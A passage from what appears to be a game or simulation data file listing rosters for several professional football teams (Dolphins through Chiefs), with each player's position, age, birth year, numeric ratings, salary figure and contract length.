Suh,30,1988,60,73,91,97,99,80,15.100000,4 DL,Jordan Phillips,25,1993,87,57,60,79,87,69,0.900000,2 DL,William Hayes,32,1986,57,73,77,73,91,79,4.200000,1 DL,Cameron Wake,35,1983,75,83,77,73,85,79,5.400000,2 DL,Davon Godchaux,23,1995,66,52,73,73,84,71,0.400000,4 DL,Vincent Taylor,23,1995,89,45,76,71,82,66,0.400000,4 DL,Charles Harris,22,1996,87,54,73,61,79,79,2.600000,4 DL,Terrence Fede,26,1992,83,40,75,61,80,75,0.400000,1 DL,Andre Branch,28,1990,68,62,64,58,75,74,6.300000,3 END_PLAYERS New England Patriots,NE QB,Tom Brady,40,1978,69,99,97,91,98,40,15.600000,3 QB,Brian Hoyer,32,1986,51,62,68,81,78,37,5.000000,2 RB,Mike Gillislee,27,1991,78,67,76,76,88,79,2.000000,2 RB,Dion Lewis,27,1991,63,70,65,67,91,79,1.000000,1 RB,Rex Burkhead,27,1991,89,64,81,75,84,77,2.600000,1 RB,James White,25,1993,90,63,70,68,89,76,2.600000,4 RB,Brandon Bolden,27,1991,64,58,75,67,88,72,0.600000,1 RB,James Develin,29,1989,58,71,76,57,70,47,0.900000,2 WR,Rob Gronkowski,28,1990,75,89,73,93,83,72,6.800000,3 WR,Chris Hogan,29,1989,74,81,73,87,88,71,2.500000,2 WR,Brandin Cooks,24,1994,67,76,77,81,96,76,2.700000,2 WR,Julian Edelman,31,1987,69,93,79,81,86,77,4.600000,3 WR,Danny Amendola,32,1986,42,73,76,79,84,72,2.800000,1 WR,Phillip Dorsett,24,1994,81,59,63,71,96,70,1.900000,2 WR,Martellus Bennett,30,1988,73,71,76,75,79,67,5.700000,3 WR,Jacob Hollister,24,1994,81,40,77,63,84,70,0.300000,3 WR,Dwayne Allen,27,1991,63,68,73,71,76,60,5.200000,3 WR,Matthew Slater,32,1986,74,67,75,60,87,67,1.300000,1 OL,Marcus Cannon,29,1989,63,76,64,85,85,60,4.900000,5 OL,Shaq Mason,24,1994,72,75,73,76,92,60,0.500000,2 OL,Nate Solder,29,1989,74,77,76,81,74,60,8.900000,1 OL,David Andrews,25,1993,74,77,77,75,85,60,1.800000,4 OL,Ted Karras,24,1994,75,40,81,75,80,60,0.400000,3 OL,Joe Thuney,25,1993,91,70,81,75,74,63,0.600000,3 OL,LaAdrian Waddle,26,1992,84,59,70,76,73,60,0.800000,1 OL,Cameron Fleming,25,1993,77,59,71,73,74,64,1.100000,1 OL,Cole Croston,24,1994,86,40,73,68,78,59,0.300000,3 OL,Joe Cardona,25,1993,97,35,75,68,46,52,0.400000,2 K,Stephen Gostkowski,33,1985,58,45,67,89,82,45,3.600000,2 K,Ryan Allen,27,1991,74,40,71,83,80,40,1.700000,2 S,Devin McCourty,30,1988,58,85,83,88,90,68,7.800000,3 S,Patrick Chung,30,1988,69,70,89,79,86,68,2.200000,2 S,Nate Ebner,29,1989,82,45,91,72,87,70,0.800000,1 S,Duron Harmon,26,1992,74,64,76,79,88,55,3.400000,4 S,Jordan Richards,24,1994,73,40,81,74,86,69,0.700000,2 S,Brandon King,24,1994,87,45,70,74,89,40,0.400000,1 CB,Malcolm Butler,27,1991,86,81,73,84,89,66,2.400000,1 CB,Johnson Bademosi,27,1991,78,45,79,79,90,60,2.000000,1 CB,Eric Rowe,25,1993,72,50,73,79,91,60,1.000000,2 CB,Stephon Gilmore,27,1991,78,67,79,80,92,45,10.400000,5 CB,Jonathan Jones,24,1994,99,45,63,75,95,40,0.300000,2 CB,Robin Vagas,25,2014,60,82,50,62,58,61,0.500000,1 LB,Dont'a Hightower,27,1991,80,81,83,89,93,76,7.100000,4 LB,Elandon Roberts,23,1995,78,60,75,75,87,71,0.400000,3 LB,David Harris,33,1985,62,61,85,76,85,68,2.000000,2 LB,Kyle Van Noy,26,1992,73,60,71,70,79,74,1.100000,1 LB,Shea McClellin,28,1990,89,63,71,68,77,70,2.400000,2 LB,Trevor Reilly,29,1989,73,45,75,61,80,67,0.400000,1 LB,Marquis Flowers,25,1993,83,45,71,58,76,74,0.400000,1 DL,Alan Branch,33,1985,66,60,67,83,90,67,3.300000,2 DL,Trey Flowers,24,1994,84,65,79,76,89,76,0.500000,2 DL,Malcom Brown,23,1995,89,68,68,73,87,70,1.800000,2 DL,Deatrich Wise Jr.,23,1995,74,56,67,73,86,74,0.600000,4 DL,Lawrence Guy,27,1991,71,67,77,71,86,70,2.700000,4 DL,Ricky Jean-Francois,31,1987,60,60,64,71,86,70,0.600000,1 DL,Lewis Kari,33,2006,54,77,76,59,66,61,0.500000,1 DL,Cassius Marsh,25,1993,98,59,79,50,71,71,0.500000,1 END_PLAYERS New York Jets,NYJ QB,Bryce Petty,26,1992,89,45,70,83,75,45,0.500000,2 QB,Christian Hackenberg,22,1996,74,50,76,91,70,40,1.000000,3 QB,Josh McCown,38,1980,57,71,70,73,79,37,5.600000,1 RB,Elijah McGuire,23,1995,80,40,76,76,89,80,0.400000,4 RB,Matt Forte,32,1986,62,64,79,79,87,77,3.100000,2 RB,Bilal Powell,29,1989,54,77,73,76,88,77,2.900000,2 RB,Lawrence Thomas,24,1994,93,45,73,45,73,45,0.300000,2 WR,Jermaine Kearse,27,1991,81,75,85,75,90,71,4.000000,2 WR,Jeremy Kerley,29,1989,67,63,75,75,86,72,0.500000,1 WR,Robby Anderson,24,1994,93,61,68,70,94,66,0.300000,2 WR,ArDarius Stewart,24,1994,78,52,75,70,89,74,0.700000,4 WR,Austin S-Jenkins,25,1993,89,58,67,70,87,65,1.200000,1 WR,Neal Sterling,25,1993,70,40,73,60,85,71,0.400000,1 WR,Chad Hansen,22,1996,89,45,75,59,89,53,0.500000,4 WR,Eric Tomlinson,25,1993,68,45,73,62,80,44,0.300000,1 OL,James Carpenter,28,1990,85,63,76,81,73,64,3.500000,2 OL,Ben Ijalana,28,1990,75,45,73,75,75,60,3.800000,2 OL,Jonotthan Harrison,26,1992,95,60,75,76,72,59,0.600000,1 OL,Kelvin Beachum,28,1990,74,68,75,71,74,63,5.900000,3 OL,Brian Winters,26,1992,72,71,76,71,73,60,4.500000,4 OL,Dakota Dozier,26,1992,70,58,76,70,79,60,0.400000,1 OL,Wesley Johnson,26,1992,66,62,81,70,73,58,1.700000,1 OL,Brandon Shell,25,1993,80,57,81,68,73,60,0.400000,3 OL,Brent Qvale,26,1992,66,52,76,61,77,60,0.300000,1 OL,Thomas Hennessy,23,1995,91,40,70,45,46,56,0.300000,3 K,Chandler Catanzaro,26,1992,69,40,68,91,82,40,0.600000,1 K,Lachlan Edwards,25,1993,73,40,65,83,75,40,0.400000,3 S,Marcus Maye,24,1994,77,54,75,75,90,74,1.500000,4 S,Rontez Miles,29,1989,88,52,79,75,85,69,0.300000,1 S,Terrence Brooks,25,1993,73,56,70,77,91,47,0.400000,1 S,Jamal Adams,22,1996,88,60,81,74,91,35,5.700000,4 CB,Buster Skrine,28,1990,73,62,73,77,91,53,4.700000,2 CB,Juston Burris,24,1994,83,45,81,75,88,55,0.500000,3 CB,Rashard Robinson,22,1996,85,61,81,77,93,37,0.500000,3 CB,Robert Nelson,27,1991,84,45,75,75,90,47,0.300000,1 CB,Morris Claiborne,27,1991,83,60,68,77,90,40,4.400000,1 CB,Darryl Roberts,27,1991,80,45,64,77,92,37,0.400000,2 CB,Derrick Jones,23,1995,94,35,73,71,90,40,0.400000,4 LB,Demario Davis,28,1990,66,65,73,75,89,77,1.500000,1 LB,Bruce Carter,29,1989,62,59,62,70,82,76,0.500000,1 LB,Jordan Jenkins,23,1995,79,59,67,68,86,70,0.600000,3 LB,Darron Lee,23,1995,87,60,79,65,79,77,2.500000,3 LB,Julian Stanford,27,1991,63,50,65,64,82,77,0.500000,1 LB,Lorenzo Mauldin,25,1993,72,56,71,64,81,69,0.600000,2 LB,Freddie Bishop,27,1991,76,40,79,62,83,66,0.300000,1 LB,Josh Martin,26,1992,84,45,71,61,80,67,1.300000,2 DL,Muhammad Wilkerson,28,1990,74,68,85,89,97,79,12.600000,4 DL,Leonard Williams,23,1995,99,71,68,76,90,76,4.800000,2 DL,Steve McLendon,31,1987,74,62,71,75,91,72,2.700000,2 DL,Ed Stinson,27,1991,86,45,65,77,85,63,0.400000,1 DL,Mike Pennel,26,1992,85,52,70,76,85,66,0.600000,1 DL,Kony Ealy,26,1992,69,63,73,67,82,79,0.500000,1 DL,Xavier Cooper,26,1992,69,52,76,70,81,71,0.500000,2 DL,David Bass,27,1991,71,52,75,60,74,71,0.500000,1 DL,Obum Gwacham,26,1992,65,40,67,60,74,74,0.400000,2 END_PLAYERS Houston Texans,HOU QB,Deshaun Watson,22,1996,89,71,83,77,79,70,3.400000,4 QB,Tom Savage,27,1991,97,50,76,87,74,40,0.400000,1 QB,Josh Johnson,31,1987,61,45,75,76,72,53,0.600000,1 RB,Lamar Miller,26,1992,74,76,73,77,92,84,4.100000,3 RB,D'onta Foreman,21,1997,77,63,76,73,90,79,0.600000,4 RB,Alfred Blue,26,1992,87,61,65,70,87,71,0.400000,1 RB,Jordan Todman,27,1991,66,45,68,63,89,76,0.500000,1 RB,Jay Prosch,25,1993,75,60,85,59,81,55,0.400000,1 WR,DeAndre Hopkins,25,1993,86,87,87,87,92,74,2.600000,5 WR,Bruce Ellington,26,1992,93,61,79,71,91,76,0.400000,1 WR,Braxton Miller,25,1993,67,45,73,68,91,76,0.600000,3 WR,Will Fuller,23,1995,86,65,73,64,95,71,2.500000,3 WR,CJ Fiedorowicz,26,1992,74,65,83,73,81,55,0.800000,1 WR,Ryan Griffin,27,1991,77,59,75,68,75,63,1.900000,3 WR,Stephen Anderson,24,1994,70,40,73,60,84,62,0.300000,2 OL,Derek Newton,30,1988,62,71,71,76,83,59,3.000000,3 OL,Greg Mancz,25,1993,91,54,77,76,72,62,0.300000,1 OL,Jeff Allen,27,1991,69,60,67,76,73,59,4.700000,3 OL,Chris Clark,32,1986,63,62,65,75,77,60,2.200000,1 OL,Julie'n Davenport,22,1996,97,45,75,73,77,62,0.600000,4 OL,Nick Martin,24,1994,85,63,75,73,75,61,1.000000,3 OL,Breno Giacomini,32,1986,62,59,76,71,86,57,2.200000,1 OL,Xavier Su'a-Filo,26,1992,75,60,77,73,74,59,1.200000,1 OL,Kyle Fuller,23,1995,66,40,77,67,74,60,0.400000,4 OL,Kendall Lamm,25,1993,82,56,77,62,82,59,0.300000,1 OL,Jon Weeks,31,1987,62,60,73,56,48,45,0.600000,3 K,Ka'lmi Fairbairn,23,1995,84,35,65,77,87,35,0.300000,2 K,Shane Lechler,41,1977,67,56,67,77,86,56,1.600000,1 S,Marcus Gilchrist,29,1989,76,64,79,80,88,76,2.400000,1 S,Eddie Pleasant,29,1989,85,60,83,74,87,69,0.700000,1 S,Andre Hal,25,1993,67,68,75,79,92,43,0.500000,1 S,Corey Moore,24,1994,80,64,77,75,87,53,0.300000,1 S,Kurtis Drummond,25,1993,86,50,75,75,85,40,0.300000,1 CB,Kevin Johnson,25,1993,70,63,75,80,88,55,2.400000,2 CB,Johnathan Joseph,33,1985,58,76,71,82,89,44,4.200000,1 CB,Kareem Jackson,29,1989,74,64,70,76,89,53,6.700000,2 CB,Treston Decoud,24,1994,73,40,71,70,87,60,0.500000,4 CB,Marcus Williams,26,1992,81,54,77,74,87,37,1.700000,1 CB,Peyton Ohotto,25,2014,55,74,69,60,65,62,0.500000,1 LB,Whitney Mercilus,27,1991,82,71,76,76,84,74,4.900000,3 LB,Benardrick McKinney,25,1993,68,67,77,76,81,77,1.200000,2 LB,Jadeveon Clowney,24,1994,80,64,65,71,85,77,6.800000,2 LB,Zach Cunningham,23,1995,87,60,81,71,84,76,0.900000,4 LB,Brian Cushing,30,1988,60,73,83,68,85,74,6.400000,3 LB,Dylan Cole,23,1995,85,40,76,67,86,72,0.300000,3 LB,Lamarr Houston,30,1988,78,68,68,68,87,68,0.600000,1 LB,Jelani Jenkins,25,1993,66,60,76,64,79,76,0.500000,1 LB,Ufomba Kamalu,25,1993,77,40,76,65,84,62,0.300000,1 LB,Brennan Scarlett,24,1994,97,45,64,59,79,69,0.300000,2 LB,Brian Peters,29,1989,88,45,76,60,73,70,0.300000,1 DL,JJ Watt,28,1990,89,85,79,95,99,77,11.700000,5 DL,Carlos Watkins,24,1994,96,40,76,75,84,74,0.500000,4 DL,DJ Reader,23,1995,83,67,75,76,86,69,0.400000,3 DL,Joel Heath,24,1994,69,58,73,68,82,70,0.300000,2 DL,Christian Covington,24,1994,99,60,62,63,80,70,0.400000,2 DL,Brandon Dunn,25,1993,83,59,73,63,81,65,0.500000,2 DL,Kenneth Bonga,28,2011,65,73,52,69,64,57,0.500000,1 DL,Randall Durden,27,2012,89,78,73,61,59,66,0.500000,1 END_PLAYERS Indianapolis Colts,IND QB,Andrew Luck,28,1990,77,73,81,91,87,67,19.400000,5 QB,Jacoby Brissett,24,1994,86,59,81,89,78,69,0.600000,3 QB,Scott Tolzien,30,1988,73,45,81,70,77,40,1.300000,1 RB,Robert Turbin,28,1990,50,59,76,73,90,76,0.800000,2 RB,Matt Jones,24,1994,77,60,65,64,89,76,0.600000,2 RB,Frank Gore,34,1984,56,89,81,73,82,75,2.500000,1 RB,Marlon Mack,21,1997,95,56,76,60,89,72,0.500000,4 RB,Darrell Daniels,23,1995,74,40,75,59,86,70,0.300000,3 WR,TY Hilton,28,1990,81,91,77,85,94,75,9.200000,4 WR,Donte Moncrief,24,1994,70,63,76,77,92,72,0.700000,1 WR,Kamar Aiken,28,1990,72,63,68,75,89,72,2.300000,1 WR,Chester Rogers,23,1995,70,57,73,70,89,70,0.300000,2 WR,Jack Doyle,27,1991,67,70,71,77,77,53,3.900000,3 WR,Erik Swoope,25,1993,85,40,65,60,80,71,0.300000,1 WR,Brandon Williams,30,1988,55,50,65,60,86,62,0.600000,1 OL,Anthony Castonzo,29,1989,90,79,73,79,93,60,7.200000,3 OL,Denzelle Good,26,1992,81,62,64,76,79,68,0.400000,2 OL,Jeremy Vujnovich,27,1991,81,40,68,81,73,60,0.300000,1 OL,Jack Mewhort,26,1992,99,67,77,79,72,64,0.700000,1 OL,Ryan Kelly,24,1994,84,71,79,75,77,64,2.500000,3 OL,Kyle Kalis,24,1994,82,40,71,77,73,60,0.300000,3 OL,Joe Haeg,24,1994,72,60,83,70,75,60,0.400000,3 OL,Le'Raven Clark,24,1994,75,40,79,67,80,59,0.600000,3 OL,Tyreek Burwell,25,1993,70,40,70,68,77,58,0.400000,1 OL,Mike Person,29,1989,84,56,67,64,75,63,0.500000,1 OL,Luke Rhodes,25,1993,68,40,77,70,46,35,0.300000,1 K,Adam Vinatieri,45,1973,65,59,71,77,94,59,1.900000,1 K,Rigoberto Sanchez,23,1995,89,40,77,85,83,40,0.300000,3 S,Clayton Geathers,25,1993,69,65,76,77,87,75,0.500000,2 S,TJ Green,22,1996,91,45,75,76,93,70,0.800000,3 S,Matthias Farley,25,1993,83,60,77,76,89,68,0.300000,2 S,Malik Hooker,21,1997,83,60,73,77,88,67,3.100000,4 S,Darius Butler,31,1987,74,64,81,77,89,45,2.800000,1 CB,Nate Hairston,23,1995,90,45,75,76,88,53,0.500000,4 CB,Chris Milton,25,1993,79,40,79,71,92,59,0.300000,1 CB,Rashaan Melvin,28,1990,73,71,70,82,90,40,0.500000,1 CB,DJ White,24,1994,92,40,79,74,89,45,0.400000,3 CB,Pierre Desir,27,1991,82,45,75,76,88,40,0.500000,1 CB,Kenny Moore,22,1996,85,40,73,75,87,40,0.300000,3 CB,Quincy Wilson,21,1997,96,45,77,71,88,43,1.300000,4 LB,Jabaal Sheard,28,1990,80,76,81,77,86,74,5.300000,3 LB,Joshua Perry,23,1995,91,40,81,73,84,67,0.600000,3 LB,Jeremiah George,25,1993,91,50,76,71,83,71,0.400000,2 LB,Barkevious Mingo,27,1991,66,59,76,70,79,77,1.600000,1 LB,John Simon,27,1991,62,63,77,70,86,72,2.800000,3 LB,Anthony Walker Jr.,22,1996,98,40,87,70,84,66,0.500000,4 LB,Antonio Morrison,23,1995,72,52,70,68,83,69,0.500000,3 LB,Jon Bostic,26,1992,97,59,75,68,80,70,0.400000,1 LB,Tarell Basham,23,1995,71,45,79,63,80,68,0.700000,4 DL,Johnathan Hankins,25,1993,94,75,70,87,93,70,5.600000,3 DL,Al Woods,30,1988,70,60,68,87,92,68,1.300000,2 DL,Grover Stewart,24,1994,95,40,79,81,86,67,0.500000,4 DL,Hassan Ridgeway,23,1995,99,40,63,76,88,75,0.500000,3 DL,Margus Hunt,30,1988,83,57,71,73,82,74,1.300000,2 DL,Henry Anderson,26,1992,90,70,67,70,86,72,0.500000,2 DL,Emerson Estrello,27,2012,85,74,50,65,65,55,0.500000,1 DL,Roland Chisley,22,2017,70,65,91,60,55,60,0.500000,1 END_PLAYERS Jacksonville Jaguars,JAX QB,Blake Bortles,25,1993,69,62,91,87,78,67,7.000000,2 QB,Chad Henne,32,1986,68,61,79,77,74,37,2.500000,1 RB,Leonard Fournette,22,1996,79,68,73,87,91,82,7.000000,4 RB,Chris Ivory,29,1989,73,73,64,75,89,79,4.600000,4 RB,TJ Yeldon,24,1994,85,63,70,76,88,77,1.300000,2 RB,Corey Grant,26,1992,81,54,62,60,96,70,0.300000,1 RB,Tommy Bohanon,27,1991,88,57,73,58,76,57,0.400000,1 WR,Allen Robinson,24,1994,73,81,76,79,90,74,0.700000,1 WR,Marqise Lee,26,1992,88,70,76,75,89,74,1.100000,1 WR,Allen Hurns,26,1992,77,75,79,75,88,74,5.100000,4 WR,Dede Westbrook,24,1994,66,40,71,75,93,72,0.600000,4 WR,Jaelen Strong,23,1995,67,40,70,75,91,68,0.600000,2 WR,Keelan Cole,24,1994,81,45,76,67,87,76,0.300000,3 WR,James O'Shaughnessy,25,1993,66,40,67,64,83,69,0.400000,2 WR,Arrelious Benn,29,1989,88,58,65,60,84,70,0.600000,2 WR,Ben Koyack,24,1994,77,56,75,63,79,55,0.300000,1 WR,Marcedes Lewis,33,1985,52,68,75,63,74,47,2.500000,2 OL,Tyler Shatley,26,1992,85,45,71,91,77,60,0.700000,2 OL,Cam Robinson,22,1996,81,60,87,83,77,61,1.600000,4 OL,Brandon Linder,25,1993,73,79,77,79,80,60,5.600000,6 OL,AJ Cann,26,1992,88,65,76,79,73,60,0.700000,2 OL,Chris Reed,25,1993,89,45,68,73,75,61,0.300000,1 OL,Josh Wells,26,1992,79,45,71,70,79,60,0.500000,2 OL,Patrick Omameh,28,1990,71,64,76,68,73,68,0.600000,1 OL,Jermey Parnell,31,1987,66,67,68,71,73,61,4.000000,3 OL,William Poehls,26,1992,91,45,75,65,77,60,0.300000,1 OL,Josh Walker,26,1992,85,40,76,61,79,60,0.400000,1 OL,Matt Overton,32,1986,75,45,70,50,57,57,0.500000,1 K,Josh Lambo,27,1991,83,40,67,87,84,40,0.400000,1 K,Brad Nortman,28,1990,70,45,71,81,82,45,1.400000,3 S,Barry Church,29,1989,86,60,89,72,85,76,4.100000,4 S,Calvin Pryor,25,1993,84,60,83,76,87,67,1.000000,1 S,Tashaun Gipson,27,1991,73,70,81,79,84,60,5.000000,4 S,Jarrod Wilson,23,1995,93,40,77,70,87,53,0.300000,2 S,Peyton Thompson,27,1991,84,45,70,74,88,40,0.400000,1 CB,Jalen Ramsey,23,1995,82,73,76,84,93,68,6.000000,3 CB,Jalen Myrick,22,1996,84,40,70,74,96,59,0.400000,4 CB,AJ Bouye,26,1992,60,76,68,82,89,47,9.700000,5 CB,Aaron Colvin,26,1992,63,64,64,77,89,53,0.600000,1 CB,Tyler Patmon,26,1992,70,45,70,75,88,40,0.400000,1 CB,Homer Trimpe,26,2013,67,73,50,65,65,62,0.500000,1 LB,Blair Brown,23,1995,99,40,81,75,87,70,0.500000,4 LB,Telvin Smith,26,1992,67,79,73,76,79,77,0.600000,1 LB,Paul Posluszny,33,1985,49,77,85,75,84,75,3.600000,1 LB,Myles Jack,22,1996,73,67,70,71,82,79,1.400000,3 LB,Donald Payne,23,1995,94,40,79,67,77,72,0.300000,3 LB,Lerentee McCray,27,1991,78,52,65,60,75,70,1.300000,1 DL,Marcell Dareus,27,1991,87,68,79,89,96,77,10.100000,5 DL,Calais Campbell,31,1987,66,83,83,76,93,79,10.300000,4 DL,Abry Jones,26,1992,64,67,71,77,87,66,2.400000,4 DL,Malik Jackson,27,1991,75,64,76,70,88,74,10.000000,5 DL,Dawuane Smoot,22,1996,94,45,81,68,81,76,0.800000,4 DL,Eli Ankou,23,1995,80,54,71,68,84,72,0.300000,3 DL,Yannick Ngakoue,22,1996,98,65,76,65,84,77,0.700000,3 DL,Sheldon Day,23,1995,84,50,76,65,85,77,0.600000,3 DL,Dante Fowler Jr.,23,1995,71,61,64,60,81,79,6.100000,2 END_PLAYERS Tennessee Titans,TEN QB,Marcus Mariota,24,1994,85,63,89,79,79,69,6.300000,2 QB,Brandon Weeden,34,1984,57,45,81,81,73,37,0.500000,1 QB,Matt Cassel,35,1983,52,60,76,71,74,37,1.600000,2 RB,Derrick Henry,23,1995,69,75,81,79,88,79,1.200000,3 RB,Demarco Murray,29,1989,65,79,75,75,89,80,3.900000,3 RB,David Fluellen,25,1993,68,40,75,63,82,75,0.400000,2 RB,Jalston Fowler,27,1991,82,60,60,61,77,63,0.500000,2 WR,Eric Decker,30,1988,55,73,81,83,86,72,4.100000,1 WR,Delanie Walker,33,1985,43,89,73,83,85,72,3.300000,2 WR,Rishard Matthews,28,1990,60,79,79,79,89,72,3.700000,2 WR,Tajae Sharpe,23,1995,79,62,76,75,87,69,0.500000,3 WR,Corey Davis,22,1996,78,59,77,70,90,76,6.600000,4 WR,Taywan Taylor,22,1996,66,45,85,68,92,72,0.700000,4 WR,Harry Douglas,33,1985,45,60,75,70,88,71,2.000000,1 WR,Jonnu Smith,22,1996,80,52,76,67,85,67,0.600000,4 WR,Eric Weems,32,1986,48,65,70,64,85,71,0.800000,2 WR,Darius Jennings,25,1993,81,40,73,61,90,66,0.400000,2 WR,Phillip Supernaw,27,1991,80,57,73,62,81,68,1.100000,2 OL,Taylor Lewan,26,1992,76,83,79,83,85,70,3.600000,2 OL,Brian Schwenke,26,1992,92,60,81,83,74,70,1.000000,1 OL,Jack Conklin,23,1995,78,75,85,76,78,60,4.000000,3 OL,Ben Jones,28,1990,76,76,85,77,78,60,2.800000,3 OL,Josh Kline,28,1990,64,76,71,70,82,73,1.300000,1 OL,Dennis Kelly,27,1991,61,52,77,75,78,60,0.900000,3 OL,Corey Levin,23,1995,87,40,75,73,78,60,0.400000,4 OL,Quinton Spain,26,1992,71,70,79,71,77,68,0.300000,1 OL,Gregorio Meneley,26,2013,81,85,67,58,66,69,0.500000,1 OL,Beau Brinkley,27,1991,72,35,71,56,50,45,0.800000,3 K,Ryan Succop,31,1987,70,57,73,81,93,57,1.800000,1 K,Brett Kern,31,1987,80,45,57,81,83,45,2.200000,3 S,Johnathan Cyprien,27,1991,83,71,81,79,89,74,4.400000,4 S,Kevin Byard,24,1994,86,63,79,79,89,72,0.700000,3 S,Da'Norris Searcy,29,1989,68,60,77,76,87,68,4.400000,2 S,Brynden Trawick,28,1990,77,45,77,74,85,70,1.500000,2 S,Curtis Riley,25,1993,89,45,76,75,89,47,0.300000,1 CB,Logan Ryan,26,1992,73,70,85,77,88,71,6.700000,3 CB,Adoree' Jackson,22,1996,83,50,76,77,92,59,2.800000,4 CB,Brice McCain,31,1987,54,57,73,77,90,40,2.000000,1 CB,LeShaun Sims,24,1994,89,62,75,77,88,40,0.400000,3 CB,Tye Smith,24,1994,99,45,76,74,87,37,0.400000,2 CB,Kalan Reed,24,1994,77,40,77,72,89,40,0.300000,1 LB,Wesley Woodyard,31,1987,79,77,85,77,80,79,2.300000,3 LB,Avery Williamson,25,1993,75,62,77,76,86,71,0.600000,1 LB,Brian Orakpo,31,1987,54,70,75,73,91,74,5.600000,2 LB,Kevin Dodd,25,1993,71,58,73,70,85,70,1.500000,3 LB,Jayon Brown,22,1996,98,45,76,68,81,70,0.500000,4 LB,Nate Palmer,28,1990,68,45,75,65,83,69,0.800000,2 LB,Erik Walden,32,1986,65,61,76,65,80,69,1.900000,1 LB,Derrick Morgan,28,1990,86,62,77,62,83,68,5.200000,2 LB,Daren Bates,27,1991,83,40,79,64,74,68,1.400000,3 DL,Jurrell Casey,28,1990,78,77,77,85,94,75,9.200000,6 DL,DaQuan Jones,26,1992,76,76,70,77,91,72,0.700000,1 DL,Sylvester Williams,29,1989,82,60,71,75,84,69,4.300000,3 DL,David King,28,1990,88,45,75,70,82,72,0.400000,1 DL,Karl Klug,29,1989,87,64,71,67,83,71,1.600000,2 DL,Austin Johnson,23,1995,85,54,77,67,85,71,1.200000,3 DL,Doug Lynah,32,2007,95,78,51,64,67,62,0.500000,1 DL,Armando Yardley,22,2017,87,84,54,61,66,55,0.500000,1 END_PLAYERS Denver Broncos,DEN QB,Brock Osweiler,27,1991,76,56,85,93,75,40,0.500000,1 QB,Paxton Lynch,23,1995,73,45,85,87,74,66,2.300000,3 QB,Trevor Siemian,26,1992,71,70,73,77,81,45,0.400000,2 RB,CJ Anderson,26,1992,71,77,75,87,89,84,2.800000,3 RB,Jamaal Charles,31,1987,57,71,68,71,90,79,1.600000,1 RB,De'Angelo Henderson,25,1993,87,40,73,67,90,74,0.400000,4 RB,Devontae Booker,25,1993,72,62,81,65,87,79,0.500000,3 RB,Andy Janovich,24,1994,92,59,73,60,79,63,0.400000,3 WR,Emmanuel Sanders,30,1988,72,89,75,95,92,71,8.600000,3 WR,Demaryius Thomas,30,1988,71,81,81,70,91,77,10.100000,3 WR,Bennie Fowler,26,1992,72,60,64,67,91,70,0.400000,1 WR,Isaiah McKenzie,22,1996,89,45,68,65,92,67,0.400000,4 WR,Jordan Taylor,25,1993,80,56,76,68,88,62,0.300000,1 WR,AJ Derby,26,1992,74,45,71,68,82,67,0.400000,2 WR,Cody Latimer,25,1993,71,35,73,63,90,69,0.700000,1 WR,Virgil Green,29,1989,61,60,67,63,86,71,2.100000,1 WR,Jeff Heuerman,25,1993,66,52,73,64,79,59,0.500000,2 OL,Matthew Paradis,28,1990,70,77,73,81,80,75,0.400000,1 OL,Garett Bolles,25,1993,82,60,79,81,87,62,2.700000,4 OL,Ronald Leary,28,1990,73,75,68,76,78,79,6.200000,4 OL,Max Garcia,26,1992,87,64,75,79,75,59,0.500000,2 OL,Cyrus Kouandjio,24,1994,82,60,62,75,77,63,0.400000,1 OL,Connor McGovern,24,1994,90,40,81,76,78,58,0.500000,3 OL,Billy Turner,26,1992,75,60,73,73,69,62,0.500000,1 OL,Allen Barbre,33,1985,64,61,73,71,77,60,1.000000,1 OL,Donald Stephenson,29,1989,88,60,75,71,74,56,3.500000,2 OL,Menelik Watson,29,1989,87,61,70,71,72,58,4.600000,3 OL,Elijah Wilkinson,22,1996,66,45,70,65,72,60,0.300000,1 OL,Casey Kreiter,27,1991,61,45,76,54,48,59,0.300000,1 K,Brandon McManus,26,1992,73,45,73,95,90,45,1.700000,1 K,Riley Dixon,24,1994,99,40,75,77,79,40,0.400000,3 S,Justin Simmons,24,1994,69,59,75,79,88,71,0.600000,3 S,Darian Stewart,29,1989,81,68,79,79,85,63,4.800000,4 S,William Parks,23,1995,86,58,76,72,85,70,0.400000,3 S,Jamal Carter,23,1995,66,35,79,69,85,68,0.300000,3 CB,Chris Harris Jr.,28,1990,80,87,83,90,91,45,6.600000,3 CB,Aqib Talib,31,1987,63,87,77,88,88,47,6.600000,3 CB,Brendan Langley,23,1995,96,40,77,74,91,55,0.600000,4 CB,Bradley Roby,25,1993,67,61,71,80,93,40,1.600000,1 CB,Lorenzo Doss,23,1995,77,45,76,71,89,37,0.400000,2 CB,Hunter Mieszala,26,2013,60,79,59,65,61,55,0.500000,1 LB,Von Miller,28,1990,81,85,85,89,93,79,14.100000,5 LB,Brandon Marshall,28,1990,70,70,77,79,86,76,5.600000,4 LB,Todd Davis,25,1993,69,73,81,77,86,74,1.700000,1 LB,Zaire Anderson,25,1993,86,40,73,67,81,66,0.300000,1 LB,Shaquil Barrett,25,1993,80,76,76,64,79,71,0.400000,1 LB,Shane Ray,24,1994,82,61,71,61,79,74,2.200000,2 LB,Demarcus Walker,23,1995,86,45,83,62,81,63,1.100000,4 LB,Kasim Edebali,28,1990,82,45,73,59,76,66,0.900000,1 DL,Derek Wolfe,27,1991,61,70,79,79,92,75,6.900000,3 DL,Domata Peko,33,1985,66,75,73,81,84,59,2.700000,2 DL,Zach Kerr,27,1991,67,45,62,76,87,68,1.200000,2 DL,Shelby Harris,26,1992,75,58,70,71,86,74,0.400000,1 DL,Billy Winn,28,1990,70,45,71,68,85,74,0.500000,1 DL,Adam Gotsis,25,1993,94,62,71,68,85,69,0.800000,3 DL,Jared Crick,28,1990,61,64,67,67,84,70,1.600000,1 DL,Henry Almodovar,25,2014,91,65,57,69,67,60,0.500000,1 END_PLAYERS Kansas City Chiefs,KC QB,Patrick Mahomes,22,1996,85,45,85,95,78,70,4.100000,4 QB,Alex Smith,33,1985,58,81,83,76,86,45,10.900000,2 QB,Tyler Bray,26,1992,72,40,70,87,70,37,0.600000,1 RB,Kareem Hunt,22,1996,91,75,75,83,90,77,0.600000,4 RB,Charcandric West,26,1992,64,60,68,68,91,76,1.000000,2 RB,Akeem Hunt,24,1994,99,54,73,59,92,68,0.300000,1 RB,Anthony Sherman,29,1989,65,64,81,54,79,55,1.400000,1 WR,Travis Kelce,28,1990,88,91,71,83,85,76,7.100000,5 WR,Tyreek Hill,23,1995,74,76,70,77,97,72,0.400000,3 WR,Albert Wilson,25,1993,96,64,73,71,91,70,1.100000,1 WR,Chris Conley,25,1993,91,60,73,70,93,70,0.600000,2 WR,Jehu Chesson,24,1994,69,45,76,71,90,69,0.500000,4 WR,De'Anthony 